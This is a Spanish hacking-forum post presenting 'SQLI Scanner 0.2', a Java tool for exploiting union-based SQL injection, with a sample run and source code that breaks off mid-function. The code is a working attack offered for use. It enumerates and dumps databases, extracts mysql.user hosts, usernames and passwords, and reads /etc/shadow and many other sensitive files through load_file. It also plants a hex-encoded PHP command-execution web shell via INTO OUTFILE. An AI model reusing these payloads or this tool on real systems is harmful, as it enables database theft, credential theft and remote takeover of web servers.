elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  Java
| | | |-+  [Java] SQLI Scanner 0.2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Java] SQLI Scanner 0.2  (Leído 2,947 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Java] SQLI Scanner 0.2
« en: 22 Enero 2013, 01:34 am »

Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.

Con las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

Un ejemplo de uso :

Código:

-- == SQLI Scanner 0.2 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

-- == OPTIONS == --

--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit

[Option] :
10

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished




El codigo es el siguiente :

Código
  1. // -- == -- == -- == ---- ==
  2. // SQLI Scanner 0.2       ||
  3. // -- == -- == -- == ---- ==
  4. // (C) Doddy Hackman 2013 ||
  5. // -- == -- == -- == ---- ==
  6.  
  7. import java.util.Scanner;
  8. import java.io.*;
  9. import java.net.*;
  10.  
  11. import java.util.regex.Matcher;
  12. import java.util.regex.Pattern;
  13.  
  14. public class Main {
  15.  
  16.    public static void main(String[] args) throws Exception {
  17.  
  18.        String target;
  19.        Scanner host = new Scanner(System.in);
  20.  
  21.        installer();
  22.  
  23.        System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
  24.        System.out.println("[+] Page : ");
  25.        target = host.nextLine();
  26.        scan(target);
  27.  
  28. //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  29. //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
  30. //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  31. //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
  32. //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
  33. //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  34. //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
  35. //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
  36. //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
  37. //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");
  38.  
  39.    }
  40.  
  41.    private static void manejo(String urla) throws Exception {
  42.  
  43.        while (true) {
  44.            System.out.println("\n-- == OPTIONS == --\n");
  45.            System.out.println("--== information_schema.tables ==--");
  46.            System.out.println("[1] : Show tables");
  47.            System.out.println("[2] : Show columns");
  48.            System.out.println("[3] : Show DBS");
  49.            System.out.println("[4] : Show tables with other DB");
  50.            System.out.println("[5] : Show columns with other DB");
  51.            System.out.println("--== mysql.user ==--");
  52.            System.out.println("[6] : Show users");
  53.            System.out.println("--== Others ==--");
  54.            System.out.println("[7] : Fuzzing files with load_file");
  55.            System.out.println("[8] : Read a file with load_file");
  56.            System.out.println("[9] : Dump");
  57.            System.out.println("[10] : Informacion of the server");
  58.            System.out.println("[11] : Create a shell with into outfile");
  59.            System.out.println("[12] : Show Log");
  60.            System.out.println("[13] : Exit");
  61.  
  62.            int op;
  63.            Scanner host = new Scanner(System.in);
  64.            System.out.println("\n[Option] :");
  65.            op = host.nextInt();
  66.  
  67.            if (op == 1) {
  68.                schematables(urla);
  69.                continuar();
  70.            } else if (op == 2) {
  71.  
  72.                String coler;
  73.  
  74.                Scanner a = new Scanner(System.in);
  75.                System.out.println("\n[+] Table : ");
  76.                coler = a.nextLine();
  77.  
  78.                schemacolumns(urla, coler);
  79.                continuar();
  80.  
  81.            } else if (op == 3) {
  82.                getdbs(urla);
  83.                continuar();
  84.            } else if (op == 4) {
  85.  
  86.                String tabler;
  87.  
  88.                Scanner a = new Scanner(System.in);
  89.                System.out.println("\n[+] DB : ");
  90.                tabler = a.nextLine();
  91.  
  92.                getablesbydb(urla, tabler);
  93.                continuar();
  94.  
  95.            } else if (op == 5) {
  96.  
  97.                String dber;
  98.                String tablerx;
  99.  
  100.                Scanner a = new Scanner(System.in);
  101.                System.out.println("\n[+] DB : ");
  102.                dber = a.nextLine();
  103.  
  104.                Scanner b = new Scanner(System.in);
  105.                System.out.println("\n[+] Table : ");
  106.                tablerx = a.nextLine();
  107.  
  108.                getcolbydb(urla, dber, tablerx);
  109.                continuar();
  110.  
  111.            } else if (op == 6) {
  112.  
  113.                mysqluser(urla);
  114.                continuar();
  115.  
  116.            } else if (op == 7) {
  117.  
  118.                fuzzfiles(urla);
  119.                continuar();
  120.  
  121.            } else if (op == 8) {
  122.  
  123.                String ar;
  124.  
  125.                Scanner f = new Scanner(System.in);
  126.                System.out.println("\n[+] File : ");
  127.                ar = f.nextLine();
  128.  
  129.                openfile(urla, ar);
  130.                continuar();
  131.  
  132.            } else if (op == 9) {
  133.  
  134.                String a;
  135.                String b;
  136.                String c;
  137.  
  138.                Scanner m = new Scanner(System.in);
  139.                System.out.println("\n[+] Table : ");
  140.                a = m.nextLine();
  141.  
  142.                Scanner n = new Scanner(System.in);
  143.                System.out.println("\n[+] Column 1 : ");
  144.                b = n.nextLine();
  145.  
  146.                Scanner l = new Scanner(System.in);
  147.                System.out.println("\n[+] Column 2 : ");
  148.                c = l.nextLine();
  149.  
  150.                dumper(urla, a, b, c);
  151.  
  152.                continuar();
  153.  
  154.            } else if (op == 10) {
  155.  
  156.                details(urla);
  157.                continuar();
  158.  
  159.            } else if (op == 11) {
  160.  
  161.                String b;
  162.                String c;
  163.  
  164.                Scanner m = new Scanner(System.in);
  165.                System.out.println("\n[+] Full Path Discloure : ");
  166.                b = m.nextLine();
  167.  
  168.                Scanner n = new Scanner(System.in);
  169.                System.out.println("\n[+] Directory to test : ");
  170.                c = n.nextLine();
  171.  
  172.                intofile(urla, b, c);
  173.                continuar();
  174.  
  175.            } else if (op == 12) {
  176.  
  177.                String ruta;
  178.  
  179.                URL h = new URL(urla);
  180.  
  181.                ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";
  182.  
  183.                System.out.println("\n[+] Check logs in : " + ruta);
  184.                continuar();
  185.  
  186.            } else if (op == 13) {
  187.                System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
  188.                continuar();
  189.                System.exit(1);
  190.            } else {
  191.                System.out.println("\n[-] Bad Option\n");
  192.                continuar();
  193.            }
  194.  
  195.        }
  196.    }
  197.  
  198.    private static void continuar() throws Exception {
  199.        System.out.println("\n[+] Finished\n");
  200.        Scanner chau = new Scanner(System.in);
  201.        chau.nextLine();
  202.    }
  203.  
  204.    private static void installer() throws Exception {
  205.  
  206.        File crear = new File("logs");
  207.  
  208.        if (!crear.isDirectory()) {
  209.            crear.mkdirs();
  210.        }
  211.  
  212.    }
  213.  
  214.    private static void intofile(String urla, String fpd, String dir) throws Exception {
  215.  
  216.        String linea;
  217.        String lugar;
  218.        String lugardos;
  219.        String webtest;
  220.        String web1;
  221.        String formandoweb;
  222.        String code;
  223.  
  224.        linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
  225.        lugar = fpd + "/cmd.php";
  226.        lugardos = dir + "/cmd.php";
  227.  
  228.        URL h = new URL(urla);
  229.  
  230.        System.out.println("\n[+] Checking ...\n");
  231.  
  232.        webtest = "http://" + h.getHost() + lugardos;
  233.        Pattern uno = null;
  234.        Matcher dos = null;
  235.  
  236.        web1 = urla.replace("hackman", linea);
  237.        formandoweb = web1 + "+into+outfile+'" + lugar + "'--";
  238.  
  239.        code = toma(formandoweb);
  240.        code = toma(webtest);
  241.  
  242.        uno = Pattern.compile("Mini Shell By Doddy");
  243.        dos = uno.matcher(code);
  244.  
  245.        if (dos.find()) {
  246.            System.out.println("[Shell UP] : " + webtest);
  247.            savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
  248.        } else {
  249.            System.out.println("[-] Error");
  250.        }
  251.  
  252.    }
  253.  
  254.    private static void openfile(String urla, String file) throws Exception {
  255.  
  256.        String archivo;
  257.        String web1;
  258.        String code;
  259.  
  260.        Pattern uno = null;
  261.        Matcher dos = null;
  262.  
  263.        archivo = encodehex(file);
  264.  
  265.        web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
  266.  
  267.        System.out.println("\n[+] Reading ...\n");
  268.  
  269.        code = toma(web1);
  270.  
  271.        uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
  272.        dos = uno.matcher(code);
  273.  
  274.        if (dos.find()) {
  275.  
  276.            System.out.println("[+] File Found : " + file);
  277.            System.out.println("\n[Source Start]\n");
  278.            System.out.println(dos.group(1));
  279.            System.out.println("\n[Source End]\n");
  280.  
  281.            savefile(urla, "\r\n" + "[+] File Found : " + file);
  282.            savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
  283.            savefile(urla, dos.group(1));
  284.            savefile(urla, "\r\n" + "[Source End]" + "\r\n");
  285.  
  286.        } else {
  287.            System.out.println("[-] Not Found");
  288.        }
  289.  
  290.    }
  291.  
  292.    private static void fuzzfiles(String urla) throws Exception {
  293.  
  294.        String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
  295.        String archivo;
  296.        String web1;
  297.        String code;
  298.  
  299.        Pattern uno = null;
  300.        Matcher dos = null;
  301.  
  302.        System.out.println("\n[+] Searching files with load_file() ....\n");
  303.  
  304.        for (int count = 0; count < archivos.length; count++) {
  305.  
  306.            archivo = encodehex(archivos[count]);
  307.  
  308.            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
  309.  
  310.            code = toma(web1);
  311.  
  312.            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
  313.            dos = uno.matcher(code);
  314.  
  315.            if (dos.find()) {
  316.  
  317.                System.out.println("[+] File Found : " + archivos[count]);
  318.                System.out.println("\n[Source Start]\n");
  319.                System.out.println(dos.group(1));
  320.                System.out.println("\n[Source End]\n");
  321.  
  322.                savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
  323.                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
  324.                savefile(urla, dos.group(1));
  325.                savefile(urla, "\r\n" + "[Source End]" + "\r\n");
  326.  
  327.            }
  328.  
  329.        }
  330.  
  331.    }
  332.  
  333.    private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {
  334.  
  335.        String web1;
  336.        String web2;
  337.        String code;
  338.        int x;
  339.  
  340.        Pattern uno = null;
  341.        Matcher dos = null;
  342.  
  343.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  344.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
  345.  
  346.        code = toma(web1 + "+from+" + tabla + "--");
  347.  
  348.        System.out.println("\n[+] Getting Values ...");
  349.  
  350.        uno = Pattern.compile("K0BRA(.*?)K0BRA");
  351.        dos = uno.matcher(code);
  352.  
  353.        if (dos.find()) {
  354.            System.out.println("\n[+] Values Founds : " + dos.group(1));
  355.            savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");
  356.  
  357.            int finals = Integer.parseInt(dos.group(1));
  358.  
  359.            for (x = 0; x <= finals; x = x + 1) {
  360.  
  361.                code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");
  362.  
  363.                uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
  364.                dos = uno.matcher(code);
  365.  
  366.                if (dos.find()) {
  367.                    System.out.println("\n[+] " + col1 + " : " + dos.group(1));
  368.                    System.out.println("[+] " + col2 + " : " + dos.group(2));
  369.  
  370.                    savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
  371.                    savefile(urla, "[+] " + col2 + " : " + dos.group(2));
  372.  
  373.                }
  374.  
  375.            }
  376.  
  377.        } else {
  378.            System.out.println("[-] Not Found");
  379.        }
  380.  
  381.    }
  382.  
  383.    private static void mysqluser(String urla) throws Exception {
  384.  
  385.        String web1;
  386.        String web2;
  387.        String code;
  388.        int x;
  389.  
  390.        Pattern uno = null;
  391.        Matcher dos = null;
  392.  
  393.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  394.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
  395.  
  396.        System.out.println("\n[+] Searching mysql.user ....");
  397.  
  398.        code = toma(web1 + "+from+mysql.user--");
  399.  
  400.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  401.        dos = uno.matcher(code);
  402.  
  403.        if (dos.find()) {
  404.            System.out.println("\n[+] Users Found : " + dos.group(1));
  405.  
  406.            savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");
  407.  
  408.            int finals = Integer.parseInt(dos.group(1));
  409.  
  410.            for (x = 0; x <= finals; x = x + 1) {
  411.  
  412.                code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");
  413.  
  414.                uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
  415.                dos = uno.matcher(code);
  416.  
  417.                if (dos.find()) {
  418.                    System.out.println("\n[+] Host : " + dos.group(1));
  419.                    System.out.println("[+] Username : " + dos.group(2));
  420.                    System.out.println("[+] Password : " + dos.group(3));
  421.  
  422.                    savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
  423.                    savefile(urla, "[+] Username : " + dos.group(2));
  424.                    savefile(urla, "[+] Password : " + dos.group(3));
  425.  
  426.                }
  427.  
  428.            }
  429.  
  430.        } else {
  431.            System.out.println("[-] Not Found");
  432.        }
  433.  
  434.    }
  435.  
  436.    private static void getcolbydb(String urla, String db, String tab) throws Exception {
  437.  
  438.        String web1;
  439.        String web2;
  440.        String code;
  441.  
  442.        String dbf;
  443.        String table;
  444.  
  445.        int x;
  446.  
  447.        Pattern uno = null;
  448.        Matcher dos = null;
  449.  
  450.        dbf = encodehex(db);
  451.        table = encodehex(tab);
  452.  
  453.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  454.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
  455.  
  456.        System.out.println("\n[+] Getting Columns ....");
  457.  
  458.        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");
  459.  
  460.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  461.        dos = uno.matcher(code);
  462.  
  463.        if (dos.find()) {
  464.            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");
  465.  
  466.            savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");
  467.  
  468.            int finals = Integer.parseInt(dos.group(1));
  469.  
  470.            for (x = 0; x <= finals; x = x + 1) {
  471.  
  472.                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");
  473.  
  474.                uno = Pattern.compile("K0BRA(.*)K0BRA");
  475.                dos = uno.matcher(code);
  476.  
  477.                if (dos.find()) {
  478.                    System.out.println("[+] Column Found : " + dos.group(1));
  479.                    savefile(urla, "[+] Column Found : " + dos.group(1));
  480.                }
  481.  
  482.            }
  483.  
  484.        } else {
  485.            System.out.println("[-] Not Found");
  486.        }
  487.  
  488.  
  489.    }
  490.  
  491.    private static void getablesbydb(String urla, String db) throws Exception {
  492.  
  493.        String web1;
  494.        String web2;
  495.        String code;
  496.        String data;
  497.        int x;
  498.        Pattern uno = null;
  499.        Matcher dos = null;
  500.  
  501.        data = encodehex(db);
  502.  
  503.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  504.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
  505.  
  506.        System.out.println("\n[+] Getting Tables ....");
  507.  
  508.        code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");
  509.  
  510.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  511.        dos = uno.matcher(code);
  512.  
  513.        if (dos.find()) {
  514.            System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
  515.            savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");
  516.  
  517.            int finals = Integer.parseInt(dos.group(1));
  518.  
  519.            for (x = 0; x <= finals; x = x + 1) {
  520.  
  521.                code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");
  522.  
  523.                uno = Pattern.compile("K0BRA(.*)K0BRA");
  524.                dos = uno.matcher(code);
  525.  
  526.                if (dos.find()) {
  527.                    System.out.println("[+] Table Found : " + dos.group(1));
  528.                    savefile(urla, "[+] Table Found : " + dos.group(1));
  529.                }
  530.  
  531.            }
  532.  
  533.        } else {
  534.            System.out.println("[-] Not Found");
  535.        }
  536.  
  537.  
  538.    }
  539.  
  540.    private static void getdbs(String urla) throws Exception {
  541.  
  542.        String web1;
  543.        String web2;
  544.        String code;
  545.        int x;
  546.        Pattern uno = null;
  547.        Matcher dos = null;
  548.  
  549.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
  550.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
  551.  
  552.        System.out.println("\n[+] Getting DBS ....");
  553.  
  554.        code = toma(web1 + "+from+information_schema.schemata--");
  555.  
  556.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  557.        dos = uno.matcher(code);
  558.  
  559.        if (dos.find()) {
  560.            System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");
  561.  
  562.            savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");
  563.  
  564.            int finals = Integer.parseInt(dos.group(1));
  565.  
  566.            for (x = 0; x <= finals; x = x + 1) {
  567.  
  568.                code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");
  569.  
  570.                uno = Pattern.compile("K0BRA(.*)K0BRA");
  571.                dos = uno.matcher(code);
  572.  
  573.                if (dos.find()) {
  574.                    System.out.println("[+] DB Found : " + dos.group(1));
  575.                    savefile(urla, "[+] DB Found : " + dos.group(1));
  576.                }
  577.  
  578.            }
  579.  
  580.        } else {
  581.            System.out.println("[-] Not Found");
  582.        }
  583.  
  584.    }
  585.  
  586.    private static void schemacolumns(String urla, String nombre) throws Exception {
  587.  
  588.        String web1;
  589.        String web2;
  590.        String code;
  591.        String tablexa;
  592.        int x;
  593.        Pattern uno = null;
  594.        Matcher dos = null;
  595.  
  596.        tablexa = encodehex(nombre);
  597.  
  598.        web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
  599.        web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
  600.  
  601.        System.out.println("\n[+] Getting columns ....");
  602.  
  603.        code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");
  604.  
  605.        uno = Pattern.compile("K0BRA(.*)K0BRA");
  606.        dos = uno.matcher(code);
  607.  
  608.        if (dos.find()) {
  609.            System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");
  610.  
  611.            savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");
  612.  
  613.            int finals = Integer.parseInt(dos.group(1));
  614.  
  615.            for (x = 0; x <= finals; x = x + 1) {
  616.  
  617.                code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");
  618.  
